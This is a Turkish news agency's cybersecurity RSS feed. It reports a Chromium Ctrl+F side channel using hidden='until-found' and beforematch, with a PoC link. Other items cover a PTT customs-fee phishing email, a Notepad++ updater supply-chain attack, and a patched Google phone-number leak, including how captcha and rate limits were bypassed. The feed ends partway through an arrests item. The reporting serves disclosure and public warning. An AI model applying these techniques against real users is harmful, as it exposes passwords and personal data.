<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
     xmlns:admin="http://webns.net/mvcb/"
     xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title>CUMHA Cumhur Haber Ajansı &#45; : Siber Güvenlik</title>
        <link>https://cumha.com.tr/rss/category/siber-guvenlik</link>
        <description>CUMHA Cumhur Haber Ajansı &#45; : Siber Güvenlik</description>
        <dc:language>tr</dc:language>
                    <dc:rights>© 2024 CUMHA (Cumhur Haber Ajansı) Tüm hakları saklıdır.</dc:rights>
        
        
                                <item>
            <title>Ctrl F ile Parolanız Okunabilir mi Chromium Tarayıcılarda hidden until found Detayı Güvenlik Alarmı Veriyor</title>
            <link>https://cumha.com.tr/ctrl-f-ile-parolaniz-okunabilir-mi-chromium-tarayicilarda-hidden-until-found-detayi-guvenlik-alarmi-veriyor</link>
            <guid>https://cumha.com.tr/ctrl-f-ile-parolaniz-okunabilir-mi-chromium-tarayicilarda-hidden-until-found-detayi-guvenlik-alarmi-veriyor</guid>
            <description><![CDATA[ Chrome, Edge ve Brave gibi Chromium tabanlı tarayıcılarda yer alan hidden=&quot;until-found&quot; özelliği, Ctrl+F ile yapılan sayfa içi aramaların izole olduğu algısını sarsıyor. beforematch olayı üzerinden kullanıcı girdilerinin dolaylı biçimde çözümlenebildiği teknik analiz, özellikle parola sızıntı siteleri açısından dikkat çeken riskler barındırıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202602/image_870x_6987231d1a624.webp" length="51380" type="image/webp"/>
            
            <pubDate>Sat, 07 Feb 2026 14:49:33 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ctrl f parola okunur mu, hidden until found güvenlik açığı, ebubekir bastama ctrl f poc, chromium tarayıcı gizlilik riski</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Chromium tabanlı tarayıcılarda erişilebilirlik ve kullanıcı deneyimi amacıyla geliştirilen <strong data-start="573" data-end="597">hidden="until-found"</strong> niteliğinin, sayfa içi arama sırasında beklenmedik bir <strong data-start="653" data-end="681">yan kanal güvenlik riski</strong> oluşturabildiği ortaya kondu. Uzman analizlere göre, kullanıcıların <strong data-start="750" data-end="760">Ctrl+F</strong> ile yaptığı aramaların tamamen istemci tarafında ve web sayfası tarafından gözlemlenemez olduğu yönündeki yaygın varsayım bu özellikle birlikte geçerliliğini yitiriyor.</p>
<p></p>
<p data-start="931" data-end="1326"><strong data-start="931" data-end="974">Ctrl F Yapıldığında DOM Sessiz Kalmıyor</strong><br>hidden="until-found" ile gizlenen içerikler normal şartlarda görünmez durumda kalıyor. Ancak sayfa içi arama sırasında eşleşme oluştuğunda, tarayıcı bu elementleri geçici olarak görünür hâle getiriyor. Bu aşamada tetiklenen <strong data-start="1199" data-end="1214">beforematch</strong> adlı DOM olayı, JavaScript tarafından dinlenebiliyor ve kullanıcı aramasına dair dolaylı bilgiler üretebiliyor.</p>
<p data-start="1328" data-end="1809"><strong data-start="1328" data-end="1370">Karakter Karakter Çözümlenebilen Arama</strong><br>Teknik incelemede, sayfaya eklenen binlerce gizli HTML elementinin olası karakter dizilerini temsil ettiği belirtiliyor. Kullanıcı Ctrl+F alanına bir karakter yazdığında, yalnızca eşleşen element için beforematch olayı tetikleniyor. Bu zincirleme yapı sayesinde, klavye dinlemesi yapılmadan kullanıcının arama girdisinin <strong data-start="1692" data-end="1725">adım adım tahmin edilebildiği</strong> ifade ediliyor. Bu yöntem, klasik anlamda bir <strong data-start="1772" data-end="1788">side‑channel</strong> olarak tanımlanıyor.</p>
<p data-start="1811" data-end="2319"><strong data-start="1811" data-end="1858">Parola Sızıntı Siteleri İçin Kritik Senaryo</strong><br>Uzmanlar, bu tekniğin özellikle <strong data-start="1891" data-end="1920">“parolanız sızdırıldı mı”</strong> iddiasıyla hizmet veren siteler açısından ciddi bir risk barındırdığına dikkat çekiyor. Kullanıcının mevcut parolasını bu tür sitelere yazması hâlinde, sayfa içinde yer alan hidden="until-found" elementleri aracılığıyla parolanın <strong data-start="2151" data-end="2188">kısmen bile olsa sızdırılabilmesi</strong> teorik olarak mümkün görülüyor. Bu durum, kullanıcı parolayı kendi rızasıyla girmiş olsa bile ek bir gizlilik tehdidi oluşturuyor.</p>
<p data-start="2321" data-end="2851"><strong data-start="2321" data-end="2366">Teknik Çalışmanın Kaynağı ve Türkçe Yayın</strong><br>Söz konusu riskin pratikte nasıl çalıştığı, uluslararası güvenlik araştırmaları kapsamında daha önce ortaya konulan teknik bir yöntem üzerinden gösteriliyor. Bu çalışmayı derleyerek Türkçeleştiren ve kamuoyuna haberleştiren isim ise siber güvenlik araştırmacısı <strong data-start="2629" data-end="2649">Ebubekir Bastama</strong> oldu. Bastama’nın internet sitesinde yayımlanan içerikte, hidden="until-found" ve beforematch kombinasyonunun Ctrl+F girdilerini nasıl dolaylı biçimde açığa çıkarabildiği ayrıntılı şekilde aktarılıyor.</p>
<p data-start="2853" data-end="3170"><strong data-start="2853" data-end="2883">Test Edilebilen PoC Adresi</strong><br>Yayımlanan çalışmada, yöntemin teorik anlatımla sınırlı kalmadığına dikkat çekiliyor. Kullanıcılar ve geliştiriciler, ilgili davranışı doğrudan test edebilmek için hazırlanan PoC’ye şu adres üzerinden erişebiliyor: <a data-start="3099" data-end="3170" rel="noopener" target="_new" class="decorated-link" href="https://ebubekirbastama.com.tr/ctrl-f-until-found-side-channel-poc.html">https://ebubekirbastama.com.tr/ctrl-f-until-found-side-channel-poc.html<span aria-hidden="true" class="ms-0.5 inline-block align-middle leading-none"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" aria-hidden="true" data-rtl-flip="" class="block h-[0.75em] w-[0.75em] stroke-current stroke-[0.75]"></svg></span></a></p>
<p data-start="3172" data-end="3485"><strong data-start="3172" data-end="3201">Boşluklar Bile Atlanmıyor</strong><br>Analizde, Ctrl+F indekslemesinde boşluk karakterlerinin tek başına algılanmaması nedeniyle <strong data-start="3293" data-end="3322">Zero‑Width Space (\u200B)</strong> gibi görünmez karakterlerin kullanıldığı aktarılıyor. Bu sayede, boşluk içeren kelime ve parola dizilerinin de tarayıcı tarafından indekslenebildiği belirtiliyor.</p>
<p data-start="3487" data-end="3988"><strong data-start="3487" data-end="3534">Hızlı Yazımda Özellikle PC’lerde Çalışmıyor</strong><br>Çalışmada özellikle masaüstü bilgisayarlara vurgu yapılıyor. Ctrl+F alanına karakterlerin <strong data-start="3625" data-end="3648">çok hızlı yazılması</strong> veya metnin yapıştırılması durumunda, tarayıcıların performans optimizasyonları nedeniyle bazı DOM taramalarını atladığı belirtiliyor. Bu senaryolarda beforematch olayının tetiklenmediği ve algılamanın çalışmadığı ifade ediliyor. Uzmanlar, bunun JavaScript kaynaklı bir hata değil, bilinçli bir tarayıcı davranışı olduğunun altını çiziyor.</p>
<p data-start="3990" data-end="4433"><strong data-start="3990" data-end="4029">Tarayıcı Güvenliği Yeniden Gündemde</strong><br>Uzman görüşlerinde, beforematch olayının JavaScript erişimine kapatılması, hidden="until-found" elementlerinin gözlemlenemez hâle getirilmesi ya da Ctrl+F indekslemesinin DOM olayı üretmeden çalışması gibi önlemlerin değerlendirilmesi gerektiği belirtiliyor. Kullanıcı deneyimi için eklenen her yeni tarayıcı özelliğinin, gizlilik ve veri güvenliği açısından yeniden ele alınması gerektiği vurgulanıyor.</p>
<p data-start="4435" data-end="4567"></p>
<p data-start="4392" data-end="4524"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Aile ve Sosyal Hizmetler Bakanlığı’nın “Dijital Dünyada Çocuk Hakları Sözleşmesi”ne Destek 300 Bin İmzayı Aştı</title>
            <link>https://cumha.com.tr/aile-ve-sosyal-hizmetler-bakanliginin-dijital-dunyada-cocuk-haklari-soezlesmesine-destek-300-bin-imzayi-asti</link>
            <guid>https://cumha.com.tr/aile-ve-sosyal-hizmetler-bakanliginin-dijital-dunyada-cocuk-haklari-soezlesmesine-destek-300-bin-imzayi-asti</guid>
            <description><![CDATA[ Aile ve Sosyal Hizmetler Bakanlığı tarafından 19 Aralık 2025’te başlatılan “Dijital Dünyada Çocuk Hakları Sözleşmesi” kampanyası, 81 ilde yürütülen farkındalık çalışmalarıyla geniş katılım sağladı. Kampanya kapsamında sözleşme 309 bin 754 kişi tarafından imzalanırken, dijital dünyada çocuk haklarının korunmasına yönelik toplumsal duyarlılık güçlendirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202602/image_870x_69871aec6f96e.webp" length="18158" type="image/webp"/>
            
            <pubDate>Sat, 07 Feb 2026 13:59:31 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>dijital dünyada çocuk hakları sözleşmesi imza sayısı, aile ve sosyal hizmetler bakanlığı çocuk hakları çalışmaları, 81 il çocuk hakları farkındalık kampanyası, dijital dünyada çocukların güçlendirilmesi eylem planı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Aile ve Sosyal Hizmetler Bakanlığı, çocukların yaşama, gelişme, korunma ve katılım haklarının dijital ortamda da güvence altına alınması amacıyla yürüttüğü çalışmalara hız kesmeden devam ediyor. Bu kapsamda hayata geçirilen <strong data-start="729" data-end="775">“Dijital Dünyada Çocuk Hakları Sözleşmesi”</strong>, toplumun geniş kesimlerinden destek görerek 300 bin imza barajını aştı.</p>
<p></p>
<p data-start="850" data-end="1164">Sivil bir inisiyatifle hazırlanan ve Aile ve Sosyal Hizmetler Bakanı <strong data-start="919" data-end="960">Mahinur Özdemir Göktaş’ın öncülüğünde</strong> kamuoyuna sunulan sözleşme, <strong data-start="989" data-end="1071">Cumhurbaşkanı Recep Tayyip Erdoğan’ın imzası ve uluslararası destek çağrısıyla</strong> dijital ortamda çocuk haklarının korunmasına yönelik güçlü bir farkındalık zemini oluşturdu.</p>
<p data-start="1166" data-end="1461">Cumhurbaşkanı Erdoğan’ın çağrısının ardından Bakanlık, internet, sosyal medya ve yapay zekâ tabanlı sistemlerin çocukların yaşamına doğrudan etki ettiği günümüzde, <strong data-start="1330" data-end="1422">koruma politikalarının güncellenmesi ve sınır aşan risklere karşı ortak hareket edilmesi</strong> hedefiyle çalışmalarını yoğunlaştırdı.</p>
<p data-start="1463" data-end="1839"><strong data-start="1463" data-end="1509">81 İlde Eş Zamanlı Farkındalık Çalışmaları</strong><br>Aile ve Sosyal Hizmetler Bakanlığı il müdürlükleri aracılığıyla 81 ilde bilgilendirme ve farkındalık artırıcı faaliyetler başlatıldı. <strong data-start="1644" data-end="1675">İl Çocuk Hakları Komiteleri</strong> öncülüğünde yürütülen çalışmalarda, çocuk haklarına ilişkin toplumsal duyarlılığın güçlendirilmesi ve sözleşmenin toplumun tüm kesimlerince benimsenmesi amaçlandı.</p>
<p data-start="1841" data-end="2168">Bu süreçte sivil toplum kuruluşları, yerel yönetimler, eğitim kurumları ve ilgili paydaşlarla iş birliği yapılarak <strong data-start="1956" data-end="2034">afiş ve broşür dağıtımları, sosyal medya paylaşımları, panel ve seminerler</strong> düzenlendi. Meydanlar, ulaşım noktaları, alışveriş merkezleri ve festival alanlarında kurulan stantlarla da geniş kitlelere ulaşıldı.</p>
<p data-start="2170" data-end="2361">Bakanlık verilerine göre, <strong data-start="2196" data-end="2361">19 Aralık 2025’te başlatılan kampanya kapsamında yürütülen çalışmalar sonucunda “Dijital Dünyada Çocuk Hakları Sözleşmesi” 309 bin 754 kişi tarafından imzalandı.</strong></p>
<p data-start="2363" data-end="2803"><strong data-start="2363" data-end="2399">2026–2030 Eylem Planı Yürürlükte</strong><br>Öte yandan Aile ve Sosyal Hizmetler Bakanlığı tarafından hazırlanan <strong data-start="2468" data-end="2546">2026–2030 Dijital Dünyada Çocukların Güçlendirilmesine Yönelik Eylem Planı</strong>, Cumhurbaşkanı Recep Tayyip Erdoğan’ın imzasıyla Resmî Gazete’de yayımlanarak yürürlüğe girdi. Eylem planıyla, çocukların çevrim içi ortamlarda güvenli şekilde var olmaları ve dijital mecralarda karşılaşabilecekleri risklere karşı korunmaları hedefleniyor.</p>
<p data-start="2805" data-end="3030"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>PTT Adıyla Gönderilen Bu Maili Açan Yandı Gümrük Vergisi Tuzağıyla Kart Bilgileri Ele Geçiriliyor</title>
            <link>https://cumha.com.tr/ptt-adiyla-goenderilen-bu-maili-acan-yandi-gumruk-vergisi-tuzagiyla-kart-bilgileri-ele-geciriliyor</link>
            <guid>https://cumha.com.tr/ptt-adiyla-goenderilen-bu-maili-acan-yandi-gumruk-vergisi-tuzagiyla-kart-bilgileri-ele-geciriliyor</guid>
            <description><![CDATA[ PTT ismi kullanılarak gönderilen “Gönderiniz için gümrük vergisi ödemesi gerekmektedir” başlıklı sahte e-postalarda yeni bir detay daha ortaya çıktı. Vatandaşları ödeme yapmaya yönlendiren maildeki butonun, yurt dışı kaynaklı şüpheli bir bağlantıya yönlendirdiği tespit edildi. Uzmanlar, linke tıklayanların ciddi maddi kayıp riskiyle karşı karşıya kaldığını belirtiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202602/image_870x_69834803cdb2e.webp" length="78834" type="image/webp"/>
            
            <pubDate>Wed, 04 Feb 2026 16:23:23 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ptt sahte gümrük vergisi maili, ptt dolandırıcılık linki, gümrük vergisi phishing saldırısı, constant contact sahte ptt maili</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>PTT adı ve logosu kullanılarak hazırlanan sahte e-postalarla vatandaşların dolandırılmaya çalışıldığı belirlendi. “Gümrük Vergisi Ödeme Bildirimi” başlığıyla gönderilen mesajlarda, gönderinin PTT gönderi merkezinde olduğu ve 150 TL ödeme yapılmaması halinde teslimatın durdurulacağı iddia ediliyor.</p>
<p></p>
<p data-start="805" data-end="1188"><strong data-start="805" data-end="841">Şüpheli Link Detayı Ortaya Çıktı</strong><br>Sahte e-postada yer alan “Ödemeyi Tamamla” butonuna tıklayan kullanıcıların, <strong data-start="919" data-end="943">i6ome8hbb.cc.rs6.net</strong> uzantılı, PTT ile hiçbir bağlantısı bulunmayan bir adrese yönlendirildiği tespit edildi. Bağlantının, Constant Contact altyapısı üzerinden gizlenmiş şekilde sunulduğu ve kullanıcıyı sahte ödeme sayfasına yönlendirmeyi amaçladığı ifade ediliyor.</p>
<p data-start="1190" data-end="1558"><strong data-start="1190" data-end="1235">Yurt Dışı Kaynaklı Adresler Alarm Veriyor</strong><br>E-postanın gönderici adresinde “<a data-start="1268" data-end="1307" class="decorated-link cursor-pointer" rel="noopener">info-santedicola.com@shared1.ccsend.com<span aria-hidden="true" class="ms-0.5 inline-block align-middle leading-none"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" aria-hidden="true" data-rtl-flip="" class="block h-[0.75em] w-[0.75em] stroke-current stroke-[0.75]"></svg></span></a>” ibaresinin yer aldığı, mesajın alt bölümünde ise ABD’ye ait açık adres bilgilerinin bulunduğu görüldü. Siber güvenlik uzmanları, bu tür <strong data-start="1445" data-end="1500">yurt dışı kaynaklı ve kurumsal görünümlü adreslerin</strong>, oltalama saldırılarında sıkça kullanıldığını vurguluyor.</p>
<p data-start="1560" data-end="1851"><strong data-start="1560" data-end="1599">Amaç Kredi Kartı ve Kişisel Veriler</strong><br>Uzmanlara göre sahte bağlantı üzerinden açılan sayfalarda kredi kartı bilgileri, kimlik verileri ve banka bilgileri hedef alınıyor. Girilen bilgilerin anlık olarak dolandırıcıların eline geçtiği ve kartlardan izinsiz harcamalar yapıldığı bildiriliyor.</p>
<p data-start="1853" data-end="2193"><strong data-start="1853" data-end="1891">PTT’nin Uygulamalarıyla Örtüşmüyor</strong><br>PTT’nin resmî uygulamalarında gümrük vergisi bildirimlerinin e-posta yoluyla ve üçüncü taraf bağlantılar üzerinden yapılmadığı belirtiliyor. Kurumun, ödemelerin yalnızca <strong data-start="2062" data-end="2113">resmî internet sitesi, e-Devlet ve PTT şubeleri</strong> aracılığıyla gerçekleştirildiğini daha önce kamuoyuna duyurduğu hatırlatılıyor.</p>
<p data-start="2195" data-end="2460"><strong data-start="2195" data-end="2228">Yetkililerden Vatandaşa Uyarı</strong><br>Siber güvenlik uzmanları, bu tür e-postaların kesinlikle açılmaması, bağlantılara tıklanmaması ve ödeme bilgisi girilmemesi gerektiğini vurguluyor. Şüpheli mesajların BTK ve ilgili resmi platformlara bildirilmesi çağrısı yapılıyor.</p>
<p data-start="2462" data-end="2598"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber güvenlik uzmanı Onur Oktay: “Notepad++ güncelleme zinciri APT saldırısıyla ele geçirildi”</title>
            <link>https://cumha.com.tr/siber-guvenlik-uzmani-onur-oktay-notepad-guncelleme-zinciri-apt-saldirisiyla-ele-gecirildi</link>
            <guid>https://cumha.com.tr/siber-guvenlik-uzmani-onur-oktay-notepad-guncelleme-zinciri-apt-saldirisiyla-ele-gecirildi</guid>
            <description><![CDATA[ Popüler kod editörü Notepad++’ın güncelleme altyapısının, Çin devlet destekli olduğu değerlendirilen bir APT grubu tarafından hedef alındığı ortaya çıktı. Haziran 2025 ile 2 Aralık 2025 tarihleri arasında gerçekleştiği belirtilen saldırıda, kullanıcıların güncelleme trafiğinin saldırgan kontrolündeki sunuculara yönlendirildiği ve sahte güncelleme paketlerinin dağıtıldığı bildirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202602/image_870x_69825d9e3b470.webp" length="52130" type="image/webp"/>
            
            <pubDate>Tue, 03 Feb 2026 23:43:42 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>notepad++ supply chain saldırısı, notepad++ güncelleme güvenliği, wingup zafiyeti nedir, apt grubu notepad++ saldırısı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Siber güvenlik uzmanı <strong data-start="552" data-end="566">Onur Oktay</strong>, Notepad++ uygulamasına yönelik ciddi bir <strong data-start="609" data-end="638">supply chain saldırısının</strong> ayrıntılarını kamuoyuyla paylaştı. Oktay, saldırının doğrudan Notepad++’ın kendi sunucularına değil, uygulamanın barındırıldığı <strong data-start="767" data-end="805">hosting sağlayıcısının altyapısına</strong> yönelik gerçekleştirildiğini açıkladı.</p>
<p data-start="846" data-end="1249"><strong data-start="846" data-end="900">Güncelleme Trafiği Saldırganların Kontrolüne Geçti</strong><br>Paylaşılan bilgilere göre, Haziran 2025 ile 2 Aralık 2025 tarihleri arasında Notepad++’ın güncelleme mekanizması olan <strong data-start="1019" data-end="1029">WinGUp</strong> üzerinden gerçekleşen trafik, saldırganlar tarafından kontrol edilen sunuculara yönlendirildi. Bu süreçte, kullanıcılara resmi güncelleme izlenimi veren <strong data-start="1183" data-end="1224">zararlı yazılım içeren sahte paketler</strong> gönderildiği belirtildi.</p>
<p data-start="1251" data-end="1649"><strong data-start="1251" data-end="1288">“Hedefli ve Seçici Bir Operasyon”</strong><br>Onur Oktay, saldırının geniş kitleleri kapsayan rastgele bir girişim olmadığını vurgulayarak, “Bu operasyon herkese açık bir saldırı değildi. Belirli IP blokları veya coğrafi bölgelerdeki kullanıcılar hedef alındı.” ifadelerini kullandı. Elde edilen bulguların, saldırının <strong data-start="1562" data-end="1599">Çin devlet destekli bir APT grubu</strong> tarafından yürütüldüğüne işaret ettiği aktarıldı.</p>
<p data-start="1651" data-end="2075"><strong data-start="1651" data-end="1696">Zafiyet Kaynak Kodda Değil Güncelleyicide</strong><br>Oktay’ın değerlendirmesine göre, Notepad++’ın kaynak kodunda herhangi bir güvenlik açığı tespit edilmedi. Ancak WinGUp aracının, indirilen dosyaların <strong data-start="1847" data-end="1915">dijital imza ve sertifika doğrulamasını yeterince sıkı yapmaması</strong>, saldırının başarıya ulaşmasına neden oldu. Hosting seviyesinde gerçekleştirilen <strong data-start="1997" data-end="2018">Man-in-the-Middle</strong> yönlendirmesiyle sahte güncellemeler meşru kabul edildi.</p>
<p data-start="2077" data-end="2430"><strong data-start="2077" data-end="2110">Alınan Önlemler ve Yeni Sürüm</strong><br>Olayın ardından Notepad++ tarafında hosting sağlayıcısı değiştirildi, tüm erişim bilgileri sıfırlandı ve <strong data-start="2216" data-end="2226">v8.8.9</strong> sürümü yayımlandı. Bu sürümle birlikte güncelleyicinin, indirilen paketlerin imza ve sertifikalarını <strong data-start="2328" data-end="2361">zorunlu olarak kontrol ettiği</strong>, doğrulama başarısız olursa güncellemenin iptal edildiği kaydedildi.</p>
<p data-start="2432" data-end="2922"><strong data-start="2432" data-end="2466">Kullanıcılara Güvenlik Uyarısı</strong><br>Saldırının hedefe özel zararlı yazılımlar içermesi nedeniyle tek bir dosya imzası bulunmadığına dikkat çekildi. Şüpheli ağ trafiği ve <strong data-start="2601" data-end="2675">%TEMP% klasöründe Notepad++ imzası taşımayan çalıştırılabilir dosyalar</strong>, olası bulaş göstergeleri arasında yer aldı. Onur Oktay, v8.8.9 öncesi sürümleri kullananların uygulama içinden güncelleme yapmaması ve ilgili dönemde güncelleme alan sistemlerin <strong data-start="2855" data-end="2890">EDR veya antivirüs çözümleriyle</strong> taranması gerektiğini belirtti.</p>
<p data-start="2924" data-end="3210"><strong data-start="2924" data-end="2960">Yeni Güvenlik Katmanları Geliyor</strong><br>Geliştirici ekip tarafından, ilerleyen sürümlerde <strong data-start="3011" data-end="3045">XML dijital imzalama (XMLDSig)</strong> desteğinin devreye alınacağı duyuruldu. Olayın, yazılım güvenliği kadar <strong data-start="3118" data-end="3142">altyapı güvenliğinin</strong> de kritik önemde olduğunu bir kez daha ortaya koyduğu ifade edildi.</p>
<p></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google Hesap Kurtarma Açığı Ortaya Çıktı: Herhangi Bir Kullanıcının Telefon Numarası Sızdırılabildi</title>
            <link>https://cumha.com.tr/google-hesap-kurtarma-acigi-ortaya-cikti-herhangi-bir-kullanicinin-telefon-numarasi-sizdirilabildi</link>
            <guid>https://cumha.com.tr/google-hesap-kurtarma-acigi-ortaya-cikti-herhangi-bir-kullanicinin-telefon-numarasi-sizdirilabildi</guid>
            <description><![CDATA[ Bir güvenlik araştırmacısı, Google’ın JavaScript’siz çalışan kullanıcı adı kurtarma sisteminde yer alan bir açık sayesinde, belirli koşullar altında herhangi bir Google kullanıcısına ait telefon numarasının tespit edilebildiğini ortaya koydu. Açık, Google tarafından doğrulandı, ödüllendirildi ve küresel olarak kapatıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_697bc16f82277.webp" length="50902" type="image/webp"/>
            
            <pubDate>Thu, 29 Jan 2026 23:22:25 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>google hesap kurtarma açığı nedir, google telefon numarası sızıntısı nasıl gerçekleşti, google botguard güvenlik zafiyeti, google no js formu kapatıldı mı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Bir güvenlik araştırmacısı, Google hesap kurtarma altyapısında yer alan ve uzun süredir fark edilmeyen bir zafiyet sayesinde, <strong data-start="585" data-end="665">herhangi bir Google kullanıcısına ait telefon numarasının sızdırılabildiğini</strong> açıkladı. Açık, Google’ın JavaScript devre dışı bırakıldığında da çalışan <strong data-start="740" data-end="772">kullanıcı adı kurtarma formu</strong> üzerinden istismar edilebildi.</p>
<p></p>
<p data-start="805" data-end="1146">Araştırmacı, JavaScript kapalıyken dahi çalışan bu formun, belirli HTTP istekleri aracılığıyla bir telefon numarasının belirli bir ad-soyad ile eşleşip eşleşmediğini doğruladığını tespit etti. Bu mekanizma sayesinde, doğru parametreler kullanıldığında bir Google hesabının varlığı ve ilişkili telefon numarası hakkında doğrulama yapılabildi.</p>
<p data-start="1148" data-end="1492"><strong data-start="1148" data-end="1185">İki Aşamalı Doğrulama Mekanizması</strong><br>İlk aşamada, hesap kurtarma formuna girilen telefon numarasıyla bir oturum anahtarı üretildi. İkinci aşamada ise bu anahtar kullanılarak ad ve soyad bilgileriyle doğrulama yapıldı. Sistem, eşleşme durumunda kullanıcıyı farklı bir kurtarma sayfasına yönlendirerek hesabın varlığını dolaylı olarak doğruladı.</p>
<p data-start="1494" data-end="1824">Başlangıçta IP bazlı hız sınırlaması ve captcha engeliyle karşılaşan araştırmacı, <strong data-start="1576" data-end="1609">BotGuard doğrulama token’ının</strong>, JavaScript’li formdan alınıp JavaScript’siz forma entegre edilmesiyle bu engellerin aşıldığını belirtti. Bu yöntemle, veri merkezi IP’leri üzerinden dahi yüksek hacimli sorguların mümkün hale geldiği ifade edildi.</p>
<p data-start="1826" data-end="2129"><strong data-start="1826" data-end="1861">IPv6 ve Büyük Ölçekli Denemeler</strong><br>Araştırmada, IPv6 adres alanlarının sunduğu genişlikten faydalanılarak her istek için farklı bir IP kullanıldığı, bu sayede hız sınırlamalarının etkisiz hale getirildiği kaydedildi. Araştırmacı, geliştirdiği araçla saniyede on binlerce deneme yapılabildiğini aktardı.</p>
<p data-start="2131" data-end="2441"><strong data-start="2131" data-end="2183">Ülke Kodu ve İsim Bilgileri de Tespit Edilebildi</strong><br>Telefon numarasının ülke kodu, Google’ın “şifremi unuttum” akışında gösterdiği maskeli numara formatları üzerinden belirlenebildi. Araştırmacı, bu formatların Google’ın kullandığı açık kaynaklı <strong data-start="2378" data-end="2396">libphonenumber</strong> kütüphanesiyle birebir örtüştüğünü belirtti.</p>
<p data-start="2443" data-end="2684">Kullanıcının ad ve soyad bilgisine ise Google Looker Studio üzerinden ulaşıldı. Araştırmacı, oluşturulan bir belgenin hedef kullanıcıya devredilmesiyle, <strong data-start="2596" data-end="2674">kullanıcının hiçbir etkileşimi olmadan adının ana sayfada görüntülendiğini</strong> kaydetti.</p>
<p data-start="2686" data-end="3025"><strong data-start="2686" data-end="2740">“İstismar Olasılığı Düşük Denildi, Ödül Artırıldı”</strong><br>Açık, 14 Nisan 2025’te Google’a bildirildi. Google, ilk değerlendirmede istismar olasılığını düşük bularak sınırlı bir ödül verdi. Araştırmacının itirazı sonrası yapılan yeniden değerlendirmede ise etkinin yüksek olduğu kabul edilerek ödül toplam <strong data-start="2988" data-end="3003">5 bin dolar</strong> seviyesine çıkarıldı.</p>
<p data-start="3027" data-end="3259">Google, 22 Mayıs 2025 itibarıyla geçici önlemlerin devreye alındığını, 6 Haziran 2025’te ise <strong data-start="3120" data-end="3203">JavaScript’siz kullanıcı adı kurtarma formunun tamamen devre dışı bırakıldığını</strong> doğruladı. Açık, 9 Haziran 2025’te kamuoyuna açıklandı.</p>
<p data-start="3261" data-end="3426"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>T.C. İçişleri Bakanı Ali Yerlikaya: “Son 5 günde siber suçlara yönelik operasyonlarda 200 şüpheli yakalandı”</title>
            <link>https://cumha.com.tr/tc-icisleri-bakani-ali-yerlikaya-son-5-gunde-siber-suclara-yoenelik-operasyonlarda-200-supheli-yakalandi</link>
            <guid>https://cumha.com.tr/tc-icisleri-bakani-ali-yerlikaya-son-5-gunde-siber-suclara-yoenelik-operasyonlarda-200-supheli-yakalandi</guid>
            <description><![CDATA[ T.C. İçişleri Bakanı Ali Yerlikaya, polis ekiplerince siber suçlarla mücadele kapsamında son 5 gündür yürütülen operasyonlarda 200 şüphelinin yakalandığını açıkladı. 19 il merkezli operasyonlarda nitelikli dolandırıcılık, çevrim içi çocuk müstehcenliği ve yasa dışı bahis suçlarına yönelik çalışmalar yürütüldü. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_697ba94a01b87.webp" length="21672" type="image/webp"/>
            
            <pubDate>Thu, 29 Jan 2026 21:39:22 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>siber suç operasyonu kaç şüpheli yakalandı, ali yerlikaya siber suç açıklaması, yasa dışı bahis operasyonu hangi illerde, çevrim içi çocuk müstehcenliği operasyonu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>T.C. İçişleri Bakanı <strong data-start="478" data-end="495">Ali Yerlikaya</strong>, sosyal medya hesabından yaptığı açıklamada, <strong data-start="541" data-end="664">Siber Suçlarla Mücadele kapsamında son 5 gündür Polis tarafından düzenlenen operasyonlarda 200 şüphelinin yakalandığını</strong> bildirdi. Yerlikaya, bu operasyonlarla dolandırıcılık, çocuk müstehcenliği ve yasa dışı bahis gibi suçlardan vatandaşların maddi ve manevi zarar görmesinin engellendiğini belirtti.</p>
<p></p>
<p data-start="847" data-end="1221"><strong data-start="847" data-end="886">Tutuklama ve Adli Kontrol Kararları</strong><br>Yerlikaya, 19 il merkezli olarak yürütülen <strong data-start="930" data-end="1019">“Nitelikli Dolandırıcılık, Çevrim İçi Çocuk Müstehcenliği ve Tacizi, Yasa Dışı Bahis”</strong> suçlarına yönelik operasyonlarda yakalanan şüphelilerden <strong data-start="1077" data-end="1103">65’inin tutuklandığını</strong>, <strong data-start="1105" data-end="1159">48’i hakkında adli kontrol hükümleri uygulandığını</strong>, diğer şüphelilerle ilgili işlemlerin ise sürdüğünü açıkladı.</p>
